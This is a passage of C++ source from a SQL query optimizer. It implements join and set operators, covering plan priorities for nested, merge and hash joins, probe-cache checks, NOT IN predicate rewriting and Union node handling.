    // prefer this nested_join iff all above conditions are met
    if (leftIsSmall && rightIsTable && isSmallTable && rScan)
    {
      // is predicate on unique key or prefix key?
      NABoolean hasUniqKeyPred = FALSE;
      NABoolean hasPrefixKeyPred = FALSE;
      const SearchKey *sKey = rScan->getSearchKey();
      if (sKey)
      {
        hasUniqKeyPred = sKey->isUnique();
        // TBD: check if key prefix selects few or many rows
        hasPrefixKeyPred = sKey->getKeyPredicates().entries() > 0;
      }
      // TBD: take care of MDAM case

      // push priority by 2 if it has a unique key predicate
      if (hasUniqKeyPred)
        result.incrementLevels(2,0);
      // push priority by 1 if it has a prefix key predicate
      else if (hasPrefixKeyPred)
        result.incrementLevels(1,0);
    }
  }

  return result;
}

// -----------------------------------------------------------------------
// member functions for class NestedJoinFlow
// -----------------------------------------------------------------------

// Clone this node (allocating on outHeap when no derived node is passed
// in) and propagate the sendEODtoTgt_ flag to the copy.
RelExpr * NestedJoinFlow::copyTopNode(RelExpr *derivedNode,
                                      CollHeap* outHeap)
{
  NestedJoinFlow *result;

  if (derivedNode == NULL)
  {
    result = new (outHeap) NestedJoinFlow(NULL,
                                          NULL,
                                          NULL,
                                          NULL,
                                          outHeap);
  }
  else
    result = (NestedJoinFlow*)derivedNode;

  result->sendEODtoTgt_ = sendEODtoTgt_;

  return NestedJoin::copyTopNode(result, outHeap);
}

// -----------------------------------------------------------------------
// member functions for class NestedJoin
// -----------------------------------------------------------------------

// NestedJoin is a physical operator, not a logical one.
NABoolean NestedJoin::isLogical() const {return FALSE;}

NABoolean NestedJoin::isPhysical() const {return TRUE;}

// Display name of this operator, selected by operator type.
const NAString NestedJoin::getText() const
{
  switch (getOperatorType())
  {
    case REL_NESTED_JOIN:
      return "nested_join";
    case REL_LEFT_NESTED_JOIN:
      return "left_nested_join";
    case REL_NESTED_SEMIJOIN:
      return "nested_semi_join";
    case REL_NESTED_ANTI_SEMIJOIN:
      return "nested_anti_semi_join";
    case REL_NESTED_JOIN_FLOW:
      return "tuple_flow";
    default:
      return "UNKNOWN??";
  } // switch
} // NestedJoin::getText()

RelExpr * NestedJoin::copyTopNode(RelExpr *derivedNode,
                                  CollHeap* outHeap)
{
  RelExpr *result;

  if (derivedNode == NULL)
  {
    result = new (outHeap) NestedJoin(NULL,
                                      NULL,
                                      getOperatorType(),
                                      outHeap);
  }
  else
    result = derivedNode;

  return Join::copyTopNode(result, outHeap);
}

NABoolean NestedJoin::allPartitionsProbed()
{
  return TRUE;//all partitions probed
}

// Conditions to check before applying the nested join probing cache:
// 1. The right child has a cardinality constraint of at most one row,
//    or else the join is a semi-join or anti-semi-join.
// 2. The right child's characteristic inputs are not unique for every
//    request (with exceptions, see below).
// 3. The nested join is not a NestedJoinFlow.
// 4. The right child does not contain any IUD operations.
// 5. The nested join's GroupAttributes do not include embedded IUD.
// 6. The execution location is not in DP2.
// 7. The nested join cache feature is not suppressed by a default.
// 8. The right child does not contain non-deterministic UDRs
NABoolean NestedJoin::isProbeCacheApplicable(PlanExecutionEnum loc) const
{
  NABoolean result = FALSE;
  GroupAttributes &rightGA = *child(1).getGroupAttr();
  NABoolean probeIsUnique = rightGA.isUnique(rightGA.getCharacteristicInputs());

  if ( !probeIsUnique )
  {
    // dig deep into the right child to see if the searchKey associated with the
    // only Scan node is unique. If it is unique, we also declare the probe is
    // unique (i.e., for each probe, there is at most one row returned). The
    // probe uniqueness property check is for the current implementation in executor
    // where only one entry per probe in the hash table in probe cache is allocated.
    RelExpr *childExpr = child(1);

    // skip over Exchange nodes
    while (childExpr && (childExpr->getOperator() == REL_EXCHANGE))
      childExpr = childExpr->child(0);

    if (childExpr)
    {
      OperatorTypeEnum x = childExpr->getOperator();
      if (x == REL_HBASE_ACCESS || x == REL_HBASE_COPROC_AGGR)
      {
        HbaseAccess *hbscan = (HbaseAccess*)childExpr;
        const SearchKey *skey = hbscan->getSearchKey();
        if (skey && skey->isUnique())
          probeIsUnique = TRUE;
      }
    }
  }

  NABoolean isTypeOfSemiJoin = isSemiJoin() || isAntiSemiJoin();

  if ((probeIsUnique || isTypeOfSemiJoin) &&
      (getOperatorType() != REL_NESTED_JOIN_FLOW) &&
      (isTSJForWrite() == FALSE ) &&
      (getGroupAttr()-> isEmbeddedUpdateOrDelete() == FALSE ) &&
      loc != EXECUTE_IN_DP2 &&
      (CmpCommon::getDefault(NESTED_JOIN_CACHE) != DF_OFF) &&
      (rightGA.getHasNonDeterministicUDRs() == FALSE))
  {
    if (! rowsFromRightHaveUniqueMatch())
    {
      // big if passed and we have a chance of duplicate probes from the left
      result = TRUE;
    }
    else
    {
      // If left probes are unique, there isn't a reason for a probe
      // cache. However, we might be able to pull up some predicate from
      // the right into the ProbeCache, which might give us non-unique
      // probes. The code below targets a specific case (ALM 4783):
      //
      //     NestedJoin
      //      /      \.
      //            Aggregate (one equi-join pred is a HAVING pred)
      //
      // We can't detect this in the optimizer (where the nested join
      // may point to a filter or a MEMO group), but that's fine, since
      // we don't really want to give this unusual case a cost advantage.
      RelExpr *childExpr = child(1);

      // skip over Exchange and MapValueIds nodes
      while (childExpr && (childExpr->getOperator() == REL_EXCHANGE ||
                           childExpr->getOperator() == REL_MAP_VALUEIDS))
        childExpr = childExpr->child(0);

      if (childExpr &&
          childExpr->getOperator().match(REL_ANY_GROUP) &&
          CmpCommon::getDefault(NESTED_JOIN_CACHE_PREDS) != DF_OFF)
      {
        GroupByAgg *childGB = (GroupByAgg *) childExpr;

        if (childGB->groupExpr().isEmpty() &&
            ! childGB->selectionPred().isEmpty())
          // This is a scalar aggregate with a HAVING predicate,
          // at least we know that there is a reasonable chance that
          // we can pull up a HAVING predicate into the probe cache
          // in method GroupByAgg::tryToPullUpPredicatesInPreCodeGen()
          result = TRUE;
      }
    }
  }

  return result;
}

// -----------------------------------------------------------------------
// member functions for class MergeJoin
// -----------------------------------------------------------------------

// MergeJoin is a physical operator, not a logical one.
NABoolean MergeJoin::isLogical() const {return FALSE;}

NABoolean MergeJoin::isPhysical() const {return TRUE;}

// Display name of this operator, selected by operator type.
const NAString MergeJoin::getText() const
{
  switch (getOperatorType())
  {
    case REL_MERGE_JOIN:
      return "merge_join";
    case REL_LEFT_MERGE_JOIN:
      return "left_merge_join";
    case REL_MERGE_SEMIJOIN:
      return "merge_semi_join";
    case REL_MERGE_ANTI_SEMIJOIN:
      return "merge_anti_semi_join";
    default:
      return "UNKNOWN merge join??";
  } // switch
} // MergeJoin::getText()

RelExpr * MergeJoin::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  RelExpr *result;

  if (derivedNode == NULL)
    result = new (outHeap) MergeJoin(NULL,
                                     NULL,
                                     getOperatorType(),
                                     NULL,
                                     outHeap);
  else
    result = derivedNode;

  return Join::copyTopNode(result, outHeap);
}

// Expose the merge join predicate for display/unparse purposes.
void MergeJoin::addLocalExpr(LIST(ExprNode *) &xlist,
                             LIST(NAString) &llist) const
{
  xlist.insert(orderedMJPreds_.rebuildExprTree());
  llist.insert("merge_join_predicate");

  Join::addLocalExpr(xlist,llist);
}

// Compute the PlanPriority for a merge join plan: riskPremiumMJ(),
// additionally multiplied by riskPremiumSerial() for serial plans.
PlanPriority MergeJoin::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty();
  Lng32 degreeOfParallelism = spp->getCountOfPartitions();
  double val = CURRSTMT_OPTDEFAULTS->riskPremiumMJ();

  if (degreeOfParallelism <= 1)
  {
    // serial plans are risky. exact an insurance premium from serial plans.
    val *= CURRSTMT_OPTDEFAULTS->riskPremiumSerial();
  }

  CostScalar premium(val);
  PlanPriority result(0, 0, premium);

  // For the option of Max Degree of Parallelism we can either use the
  // value set in comp_int_9 (if positive) or we use the number of CPUs
  // if the CQD is set to -1, or feature is disabled if CQD is 0 (default).
  Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) )
  {
    // if CQD is set to -1 this means use the number of CPUs
    maxDegree = spp->getCurrentCountOfCPUs();
  }
  if (maxDegree > 1)  // CQD set to 0 means feature is OFF
  {
    if (degreeOfParallelism < maxDegree)
      result.incrementLevels(0,-10); // need to replace with constant
  }

  return result;
}

// -----------------------------------------------------------------------
// member functions for class HashJoin
// -----------------------------------------------------------------------

// HashJoin is a physical operator, not a logical one.
NABoolean HashJoin::isLogical() const { return FALSE; }

NABoolean HashJoin::isPhysical() const { return TRUE; }

// Display name of this operator; hybrid/ordered hash joins degenerate to
// "ordered_cross_product" when there are no equi-join predicates.
const NAString HashJoin::getText() const
{
  switch (getOperatorType())
  {
    case REL_HASH_JOIN:
      return "hash_join";
    case REL_LEFT_HASH_JOIN:
      return "left_hash_join";
    case REL_HASH_SEMIJOIN:
      return "semi_join";
    case REL_HASH_ANTI_SEMIJOIN:
      return "hash_anti_semi_join";
    case REL_HYBRID_HASH_JOIN:
    {
      if(((HashJoin *)this)->isOrderedCrossProduct())
        return "ordered_cross_product";
      else
        return "hybrid_hash_join";
    }
    case REL_LEFT_HYBRID_HASH_JOIN:
      return "left_hybrid_hash_join";
    case REL_FULL_HYBRID_HASH_JOIN:
      return "full_hybrid_hash_join";
    case REL_HYBRID_HASH_SEMIJOIN:
      return "hybrid_hash_semi_join";
    case REL_HYBRID_HASH_ANTI_SEMIJOIN:
      return "hybrid_hash_anti_semi_join";
    case REL_ORDERED_HASH_JOIN:
    {
      if (getEquiJoinPredicates().isEmpty())
        return "ordered_cross_product";
      else
        return "ordered_hash_join";
    }
    case REL_LEFT_ORDERED_HASH_JOIN:
      return "left_ordered_hash_join";
    case REL_ORDERED_HASH_SEMIJOIN:
      return "ordered_hash_semi_join";
    case REL_ORDERED_HASH_ANTI_SEMIJOIN:
      return "ordered_hash_anti_semi_join";
    default:
      return "UNKNOWN hash join??";
  } // switch
} // HashJoin::getText()

// Clone this node; freshly-allocated copies also receive the ordered-
// cross-product, reuse and no-overflow settings, and every copy receives
// the NOT-IN subquery transformation state.
RelExpr * HashJoin::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  RelExpr *result;

  if (derivedNode == NULL)
  {
    result = new (outHeap) HashJoin(NULL,
                                    NULL,
                                    getOperatorType(),
                                    NULL,
                                    outHeap);
    ((HashJoin *)result)->setIsOrderedCrossProduct(isOrderedCrossProduct());
    ((HashJoin *)result)->setReuse(isReuse());
    ((HashJoin *)result)->setNoOverflow(isNoOverflow());
  }
  else
    result = derivedNode;

  ((HashJoin*)result)->isNotInSubqTransform_ = isNotInSubqTransform_;
  ((HashJoin*)result)->requireOneBroadcast_ = requireOneBroadcast_;
  ((HashJoin*)result)->innerAccessOnePartition_ = innerAccessOnePartition_;

  return Join::copyTopNode(result, outHeap);
}

// Compute the PlanPriority for a hash join plan: serial premium applies
// unless the inner accesses only one partition; first-N optimization
// raises the priority level.
PlanPriority HashJoin::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty();
  Lng32 degreeOfParallelism = spp->getCountOfPartitions();
  double val = 1;

  if (degreeOfParallelism <= 1 &&
      getInnerAccessOnePartition() == FALSE )
  {
    // serial plans are risky. exact an insurance premium from serial plans.
    // The exception is when only one partition is accessed.
    val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial();
  }

  CostScalar premium(val);
  PlanPriority result(0, 0, premium);

  if (QueryAnalysis::Instance() AND
      QueryAnalysis::Instance()->optimizeForFirstNRows())
    result.incrementLevels(HASH_JOIN_FIRST_N_PRIORITY,0);

  // For the option of Max Degree of Parallelism we can either use the
  // value set in comp_int_9 (if positive) or we use the number of CPUs
  // if the CQD is set to -1, or feature is disabled if CQD is 0 (default).
  Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) )
  {
    // if CQD is set to -1 this means use the number of CPUs
    maxDegree = spp->getCurrentCountOfCPUs();
  }
  if (maxDegree > 1)  // CQD set to 0 means feature is OFF
  {
    if (degreeOfParallelism < maxDegree)
      result.incrementLevels(0,-10); // need to replace with constant
  }

  return result;
}

// Expose the hash join's local expressions (equi-join predicates, reuse
// comparison values, inner/outer null checks) for display/unparse.
void HashJoin::addLocalExpr(LIST(ExprNode *) &xlist,
                            LIST(NAString) &llist) const
{
  if (NOT getEquiJoinPredicates().isEmpty())
  {
    xlist.insert(getEquiJoinPredicates().rebuildExprTree());
    llist.insert("hash_join_predicates");
  }

  if (NOT valuesGivenToChild_.isEmpty())
  {
    xlist.insert(valuesGivenToChild_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("reuse_comparison_values");
  }

  if (NOT checkInnerNullExpr_.isEmpty())
  {
    xlist.insert(checkInnerNullExpr_.rebuildExprTree());
    llist.insert("check_inner_null_expr");
  }

  if (NOT checkOuterNullExpr_.isEmpty())
  {
    xlist.insert(checkOuterNullExpr_.rebuildExprTree());
    llist.insert("check_outer_null_expr");
  }

  Join::addLocalExpr(xlist,llist);
}

// For a hash anti-semi-join, replace a single-column NOT_IN predicate in
// the join predicates by its cached equivalent equi-predicate, and record
// the NOT-IN subquery transformation state on this node.
void HashJoin::resolveSingleColNotInPredicate()
{
  if (!isAntiSemiJoin() || !isHashJoin())
  {
    return;
  }

  ValueIdSet jPred = joinPred();
  short notinCount=0;

  for ( ValueId valId = jPred.init();
        jPred.next(valId);
        jPred.advance(valId))
  {
    ItemExpr * itmExpr = valId.getItemExpr();

    if (itmExpr->getOperatorType() == ITM_NOT_IN)
    {
      if (((NotIn*)itmExpr)->getEquivEquiPredicate() == NULL_VALUE_ID)
      {
        ((NotIn*)itmExpr)->cacheEquivEquiPredicate();
      }

      // use cached value ids
      equiJoinPredicates() += ((NotIn*)itmExpr)->getEquivEquiPredicate();
      joinPred() -=valId;
      joinPred() += ((NotIn*)itmExpr)->getEquivEquiPredicate();
      notinCount++;

      setIsNotInSubqTransform(TRUE);
      setRequireOneBroadcast(((NotIn*)itmExpr)->getIsOneInnerBroadcastRequired());
    }
  }
  DCMPASSERT(notinCount <=1);
}//void HashJoin::resolveSingleColNotInPredicate()

// For a (non-hash) anti-semi-join, replace a single-column NOT_IN
// predicate in the join predicates by its cached equivalent
// non-equi-predicate.
void Join::resolveSingleColNotInPredicate()
{
  // applies only to anti_semi_joins
  if (!isAntiSemiJoin())
  {
    return;
  }

  short notinCount = 0;
  ValueIdSet jPred = joinPred();

  for ( ValueId valId = jPred.init();
        jPred.next(valId);
        jPred.advance(valId))
  {
    ItemExpr * itmExpr = valId.getItemExpr();

    if (itmExpr->getOperatorType() == ITM_NOT_IN)
    {
      if (((NotIn*)itmExpr)->getEquivNonEquiPredicate() == NULL_VALUE_ID )
      {
        ((NotIn*)itmExpr)->cacheEquivNonEquiPredicate();
      }

      //use cached valueids
      joinPred() -= valId;
      joinPred() += ((NotIn*)itmExpr)->getEquivNonEquiPredicate();
      notinCount++;
    }
  }
  DCMPASSERT(notinCount <=1);
}//void Join::resolveSingleColNotInPredicate()

// Join::rewriteNotInPredicate()
// this method is called right after the predicates are pushed down and
// the goal is to make sure that only the NotIn predicate is present.
// if any other predicate exists besides the NotIn predicate then we can not
// optimize the hash anti semi join when the outer column is nullable and may
// have null values
void Join::rewriteNotInPredicate()
{
  // applies only to anti_semi_joins
  if (!isAntiSemiJoin())
  {
    return;
  }

  ValueIdSet jPred = joinPred();
  ItemExpr * notinExpr=NULL;
  NABoolean otherPredicatesExist = FALSE;

  for ( ValueId valId = jPred.init();
        jPred.next(valId);
        jPred.advance(valId))
  {
    ItemExpr * itmExpr = valId.getItemExpr();

    if (itmExpr->getOperatorType() != ITM_NOT_IN)
    {
      otherPredicatesExist = TRUE;
    }
    else
    {
      // assert if we already encountered a not in
      DCMPASSERT(notinExpr == NULL);
      notinExpr = itmExpr;
    }
  }

  if (notinExpr)
  {
    //single column
    DCMPASSERT (notinExpr->child(0)->getOperatorType() != ITM_ITEM_LIST);

    const NAType &outerType = notinExpr->child(0)->getValueId().getType();
    GroupAttributes * leftChildGrpAttr = child(0).getGroupAttr();
    GroupAttributes * rightChildGrpAttr = child(1).getGroupAttr();

    const ValueIdSet &inputs = getGroupAttr()->getCharacteristicInputs();
    ValueIdSet refs;

    ValueId valId = notinExpr->getValueId();

    if ((outerType.supportsSQLnull() &&
         !((NotIn*)notinExpr)->getOuterNullFilteringDetected() &&
         otherPredicatesExist) ||
        //fix for solution Id:10-100331-9194
        //select count(*) from h2_data_1k_37 where col_lar2 <> all (select col_id from
        //h2_data_1k_37 where col_id=100) ;
        //NotIn(VEGRef(col_lar2),VEGRef(col_id=100)) is in the join predicate and in the characteristic
        //outputs of the child. changing it to equipredicate may lead to wrong results
        //the below code will change the NotIn(a,b) predicate to NOT(a<>B is true) when the predicate is covered
        //by one of the children
        leftChildGrpAttr->covers(valId, inputs, refs) ||
        rightChildGrpAttr->covers(valId, inputs, refs))
    {
      ValueId tmpId = ((NotIn *)notinExpr)->createEquivNonEquiPredicate();
      ItemExpr * tmpItemExpr = tmpId.getItemExpr();
      valId.replaceItemExpr(tmpItemExpr);
    }
  }
}//Join::rewriteNotInPredicate()

// Join::rewriteNotInPredicate( ValueIdSet & origVidSet, ValueIdSet & newVidSet)
// if both the outer and the inner columns are not nullable or are nullable but
// have no NULL values then the NotIn Predicate is changed to an equi-predicate.
// otherwise the NotIn predicate is not changed and the optimizer will decide what
// to do with it
// this method is called right after the pull up of the predicates in join::transformNode()
// in the case of anti semi join the inner predicates are pulled and added to join pred
// and the outer predicates are pulled and added to selectionPredicates
// When we look for outer NULL filtering predicates we look in the selection predicates
// and when we look for inner NULL filtering predicates we look in the join predicates
void Join::rewriteNotInPredicate( ValueIdSet & origVidSet, ValueIdSet & newVidSet)
{
  // applies only to anti_semi_joins
  if (!isAntiSemiJoin())
  {
    return;
  }

  ValueIdSet jPred = joinPred();
  ValueIdSet selPred = selectionPred();
  short notinCount = 0;

  for ( ValueId valId = joinPred().init();
        joinPred().next(valId);
        joinPred().advance(valId))
  {
    ItemExpr * itmExpr = valId.getItemExpr();

    if (itmExpr->getOperatorType() == ITM_NOT_IN)
    {
      //single column
      if (itmExpr->child(0)->getOperatorType() != ITM_ITEM_LIST)
      {
        const NAType &innerType = itmExpr->child(1)->getValueId().getType();
        const NAType &outerType = itmExpr->child(0)->getValueId().getType();
        selPred -= valId;
        jPred -= valId;

        NABoolean child0IsNotNullable = selPred.isNotNullable(itmExpr->child(0)) ;
        NABoolean child1IsNotNullable = jPred.isNotNullable(itmExpr->child(1)) ;

        if ((!innerType.supportsSQLnull() || child1IsNotNullable) &&
            (!outerType.supportsSQLnull() || child0IsNotNullable) )
        {
          origVidSet += valId;
          // we can change the not in predicate to an equi-predicate in this case
          newVidSet += ((NotIn *)itmExpr)->createEquivEquiPredicate();
        }
        else
        {
          // outer references case are not handled by optimization
          ValueIdSet rightSideofPred;
          ValueIdSet tempSet;
          rightSideofPred.insert(itmExpr->child(1)->getValueId());
          rightSideofPred.getReferencedPredicates(child(0)->getGroupAttr()->getCharacteristicOutputs(), tempSet) ;
          if (!tempSet.isEmpty())
          {
            origVidSet += valId;
            // we can change the not in predicate to an equi-predicate in this case
            newVidSet += ((NotIn *)itmExpr)->createEquivNonEquiPredicate();
          }
          else
          {
            if (CmpCommon::getDefault(NOT_IN_OUTER_OPTIMIZATION) == DF_OFF)
            {
              //NOT_IN_OUTER_OPTIMIZATION == OFF ==> if outer is nullable and may have NULL values
              // change to Non equi-predicate here
              if ( outerType.supportsSQLnull() &&
                   !child0IsNotNullable)
              {
                origVidSet += valId;
                // we can change the not in predicate to an equi-predicate in this case
                newVidSet += ((NotIn *)itmExpr)->createEquivNonEquiPredicate();
              }
            }
            else
            {
              // case where outer or inner columns (or both) is nullable and may have NULL values
              // optimizer will decide depending on the type of join
              // hash join     ==> equi-predicate with cancel expression when inner is nullable
              //               ==> filter to filter out NULL values coming from outer side
              //               ==> when inner is not empty
              //               ==> NULL values coming from outer side are not filtered out when
              //               ==> inner is empty
              // non hash join ==> Non equi-predicate
              if (child0IsNotNullable)
              {
                ((NotIn*)itmExpr)->setOuterNullFilteringDetected(TRUE);
              }
              if (child1IsNotNullable)
              {
                ((NotIn*)itmExpr)->setInnerNullFilteringDetected(TRUE);
              }
            }
          }
        }
      }
      else
      {
        // multi-column NOT IN: delegate to the NotIn rewrite helper
        ValueIdSet predSet ;
        //ValueIdSet jPreds;
        //ValueIdSet selPred;
        //jPreds = joinPred();
        //selPred = selectionPred();
        predSet = NotIn::rewriteMultiColNotInPredicate( valId,
                                                        joinPred(),
                                                        selectionPred());

        DCMPASSERT(predSet.entries() >0);

        origVidSet += valId;
        newVidSet += predSet;
      }
      notinCount++;
    }//if (itmExpr->getOperatorType() == ITM_NOT_IN)
  }
  DCMPASSERT(notinCount <=1);
}//void Join::rewriteNotInPredicate()

// -----------------------------------------------------------------------
// member functions for class Intersect
// -----------------------------------------------------------------------
Intersect::Intersect(RelExpr *leftChild,
                     RelExpr *rightChild)
  : RelExpr(REL_INTERSECT, leftChild, rightChild)
{
  setNonCacheable();
}

Intersect::~Intersect() {}

Int32 Intersect::getArity() const { return 2; }

const NAString Intersect::getText() const
{
  return "intersect";
}

// -----------------------------------------------------------------------
// member functions for class Except
// -----------------------------------------------------------------------
Except::Except(RelExpr *leftChild,
               RelExpr *rightChild)
  : RelExpr(REL_EXCEPT, leftChild, rightChild)
{
  setNonCacheable();
}

Except::~Except() {}

Int32 Except::getArity() const { return 2; }

const NAString Except::getText() const
{
  return "except";
}

// -----------------------------------------------------------------------
// member functions for class Union
// -----------------------------------------------------------------------
Union::Union(RelExpr *leftChild,
             RelExpr *rightChild,
             UnionMap *unionMap,
             ItemExpr *condExpr,
             OperatorTypeEnum otype,
             CollHeap *oHeap,
             NABoolean sysGenerated,
             NABoolean mayBeCacheable )
  : RelExpr(otype, leftChild, rightChild, oHeap),
    condExprTree_(condExpr)
   ,trigExceptExprTree_(NULL)
   ,previousIF_(NULL)
   ,flags_(0)
   ,leftList_(NULL)
,rightList_(NULL)
  ,currentChild_(-1)
  ,alternateRightChildOrderExprTree_(NULL) //++MV
  ,isSystemGenerated_(sysGenerated)
  ,isSerialUnion_(FALSE)
  ,variablesSet_(oHeap)
{
  // honor the caller's cacheability hint
  if ( NOT mayBeCacheable )
    setNonCacheable();

  // Share the caller-supplied UnionMap (bump its ref count),
  // or allocate a private one.
  if (unionMap != NULL)
  {
    unionMap_ = unionMap;
    unionMap_->count_++;
  }
  else
    unionMap_ = new (oHeap) UnionMap;

  condExpr_.clear();
  trigExceptExpr_.clear();
  alternateRightChildOrderExpr_.clear(); //++MV
  variablesSet_.clear();
  controlFlags_ = 0; //++ Triggers -
}

// Destructor: the UnionMap is shared; only delete it when its reference
// count has dropped to zero.
// NOTE(review): count_ is decremented in addValueIdUnion; confirm all
// decrement sites before changing this ownership protocol.
Union::~Union() { if (unionMap_->count_ == 0) delete unionMap_;}

// Union is a binary operator.
Int32 Union::getArity() const { return 2; }

// Rewrite each expression in unionExpr once in terms of the left child's
// value ids (into leftExpr) and once in terms of the right child's
// (into rightExpr), using the two maps kept in the UnionMap.
void Union::rewriteUnionExpr(const ValueIdSet &unionExpr,
                             ValueIdSet &leftExpr,
                             ValueIdSet &rightExpr) const
{
  // walk the original selection predicates and rewrite them in terms
  // of the mapped value ids of the union's inputs
  for (ValueId x = unionExpr.init(); unionExpr.next(x); unionExpr.advance(x))
  {
    ValueId newLeftExpr =
      x.getItemExpr()->mapAndRewrite(getLeftMap(),TRUE);
    ValueId newRightExpr =
      x.getItemExpr()->mapAndRewrite(getRightMap(),TRUE);

    leftExpr += newLeftExpr;
    rightExpr += newRightExpr;
  }
} // Union::rewriteExprs()

// Push parent predicates down into BOTH children, after mapping each
// predicate into the respective child's value ids. All predicates must be
// pushable; predicatesOnParent is emptied on return.
void Union::pushdownCoveredExpr(const ValueIdSet & outputExpr,
                                const ValueIdSet & newExternalInputs,
                                ValueIdSet & predicatesOnParent,
                                const ValueIdSet * setOfValuesReqdByParent,
                                Lng32 // childIndex ignored
                                )
{
  ValueIdSet resultSet = outputExpr;
  if (setOfValuesReqdByParent)
    resultSet += *setOfValuesReqdByParent;
  resultSet += getGroupAttr()->getCharacteristicInputs();

  // alternateRightChildOrderExpr expressions should not be pushed down
  resultSet.insertList(alternateRightChildOrderExpr()); // ++MV

  // ---------------------------------------------------------------------
  // Not all the output columns from the union may be needed.
  // Map the required input list to the corresponding left
  // and right required outputs list
  // ---------------------------------------------------------------------
  ValueIdSet valuesRequiredFromLeft, valuesRequiredFromRight;
  rewriteUnionExpr(resultSet,
                   valuesRequiredFromLeft,
                   valuesRequiredFromRight);

  // ---------------------------------------------------------------------
  // Rewrite selectionPred()
  // ---------------------------------------------------------------------
  ValueIdSet leftPred, rightPred, emptySet;
  rewriteUnionExpr(predicatesOnParent, leftPred, rightPred);

  // push the left predicates to the left subtree
  // empty set for the first argument indicates that there are no
  // non-essential outputs, (in other words, outputs that are
  // simply passed through)
  RelExpr::pushdownCoveredExpr(emptySet,
                               newExternalInputs,
                               leftPred,
                               &valuesRequiredFromLeft,
                               0
                               );

  // push the right predicates to the right subtree
  RelExpr::pushdownCoveredExpr(emptySet,
                               newExternalInputs,
                               rightPred,
                               &valuesRequiredFromRight,
                               1
                               );

  // Verify that all the predicates were pushed
  leftPred -= child(0)->selectionPred();
  CMPASSERT( leftPred.isEmpty() );

  rightPred -= child(1)->selectionPred();
  CMPASSERT( rightPred.isEmpty() );

  // All the predicates have been pushed down to the children.
  predicatesOnParent.clear();
} // Union::pushdownCoveredExpr

// Collect the values this union can produce: the results of the
// ValueIdUnion expressions recorded in the UnionMap's colMapTable_.
void Union::getPotentialOutputValues(ValueIdSet & outputValues) const
{
  outputValues.clear();
  //
  // The output of the union is defined by the ValueIdUnion
  // expressions that are maintained in the colMapTable_.
  //
  Lng32 ne = unionMap_->colMapTable_.entries();
  for (Lng32 index = 0; index < ne; index++)
  {
    // Accumulate the ValueIds of the result of the union
    // in the set provided by the caller.
outputValues += ((ValueIdUnion *)
                     (unionMap_->colMapTable_[index].getItemExpr()))->getResult();
  }
} // Union::getPotentialOutputValues()

// Hash of this node's own (top) state, used for memo/group lookups.
HashValue Union::topHash()
{
  HashValue result = RelExpr::topHash();

  // result ^= colMapTable_;

  return result;
}

// Deep equality of the union-specific state (the UnionMap pointer and the
// bound condition/trigger/order expressions); used for duplicate detection.
NABoolean Union::duplicateMatch(const RelExpr & other) const
{
  if (NOT RelExpr::duplicateMatch(other))
    return FALSE;

  Union &o = (Union &) other;

  if (NOT ((unionMap_ == o.unionMap_) AND
           (condExpr_ == o.condExpr_) AND
           (trigExceptExpr_ == o.trigExceptExpr_) AND
           (alternateRightChildOrderExpr_ == o.alternateRightChildOrderExpr_))) //++MV
    return FALSE;

  return TRUE;
}

// Copy this node's own state into derivedNode (or a fresh Union).
// Parse trees are deep-copied; bound expression sets are shared by value.
RelExpr * Union::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  Union *result;

  if (derivedNode == NULL)
    result = new (outHeap) Union(NULL,
                                 NULL,
                                 unionMap_,
                                 NULL,
                                 getOperatorType(),
                                 outHeap);
  else
    result = (Union *) derivedNode;

  if (condExprTree_ != NULL)
    result->condExprTree_ = condExprTree_->copyTree(outHeap)->castToItemExpr();

  if (trigExceptExprTree_ != NULL)
    result->trigExceptExprTree_ =
      trigExceptExprTree_->copyTree(outHeap)->castToItemExpr();

  //++MV -
  if (alternateRightChildOrderExprTree_ != NULL)
    result->alternateRightChildOrderExprTree_ =
      alternateRightChildOrderExprTree_->copyTree(outHeap)->castToItemExpr();
  //--MV -

  result->condExpr_ = condExpr_;
  result->trigExceptExpr_ = trigExceptExpr_;
  result->alternateRightChildOrderExpr_ = alternateRightChildOrderExpr_;
  result->setUnionFlags(getUnionFlags());

  //++Triggers -
  result->controlFlags_ = controlFlags_;
  result->isSystemGenerated_ = isSystemGenerated_;
  if (getSerialUnion())
  {
    result->setSerialUnion();
  }

  return RelExpr::copyTopNode(result, outHeap);
}

// Record one ValueIdUnion (the union of one output column's left and right
// sources) in the UnionMap. Called by the binder only; a shared UnionMap is
// un-shared (copy-on-write) before the first insertion.
void Union::addValueIdUnion(ValueId vidUnion, CollHeap* heap)
{
  ValueIdUnion *xvid = (ValueIdUnion *) vidUnion.getItemExpr();

  CMPASSERT(vidUnion.getItemExpr()->getOperatorType() == ITM_VALUEIDUNION);

  // This method is only called by the binder when it is first
  // building the unionMap
  if(unionMap_->count_ > 1)
  {
    unionMap_->count_--;
    unionMap_ = new (heap) UnionMap;
  }

  CMPASSERT(unionMap_->count_ == 1);

  // add the value id to the list of value ids for ValueIdUnion expressions
  // and also add entries to the two maps that describe the same information
  unionMap_->colMapTable_.insert(vidUnion);
  unionMap_->leftColMap_.addMapEntry(vidUnion,xvid->getLeftSource());
  unionMap_->rightColMap_.addMapEntry(vidUnion,xvid->getRightSource());
}

//++ Triggers -
// Mark a blocked/ordered union as producing no outputs.
void Union::setNoOutputs()
{
  CMPASSERT(flags_ == UNION_BLOCKED || flags_ == UNION_ORDERED);
  controlFlags_ |= NO_OUTPUTS;
}

// Expose the locally attached expressions (parse trees and bound sets)
// for tree display/debugging.
void Union::addLocalExpr(LIST(ExprNode *) &xlist,
                         LIST(NAString) &llist) const
{
  if (condExprTree_ != NULL)
  {
    xlist.insert(condExprTree_);
    llist.insert("condExprTree");
  }

  if (NOT condExpr_.isEmpty())
  {
